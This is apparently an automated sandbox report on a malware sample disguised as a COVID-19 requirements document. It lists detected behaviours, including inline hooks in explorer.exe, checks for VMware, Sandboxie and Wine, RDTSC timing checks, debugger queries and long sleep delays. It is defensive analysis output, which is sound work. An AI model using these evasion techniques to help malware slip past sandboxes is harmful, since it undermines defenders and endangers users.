Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process information set: NOOPENFILEERRORBOX (24 occurrences)
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: Process Memory Space: COVID-19-Related Requirements.exe PID: 6852, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 0000000000B198E4 second address: 0000000000B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe | RDTSC instruction interceptor: First address: 0000000000B19B5E second address: 0000000000B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe TID: 6920 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: explorer.exe, 00000010.00000000.463020458.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000010.00000000.462913500.00000000083E9000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 00000010.00000000.458024003.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000010.00000000.462913500.00000000083E9000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000010.00000000.462041063.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000010.00000000.454333728.000000000461E000.00000004.00000001.sdmp | Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433068609.00000000032DE000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000010.00000000.462041063.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000010.00000000.463020458.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000010.00000000.455835709.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000010.00000000.435521033.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AEF716 mov eax, dword ptr fs:[00000030h]
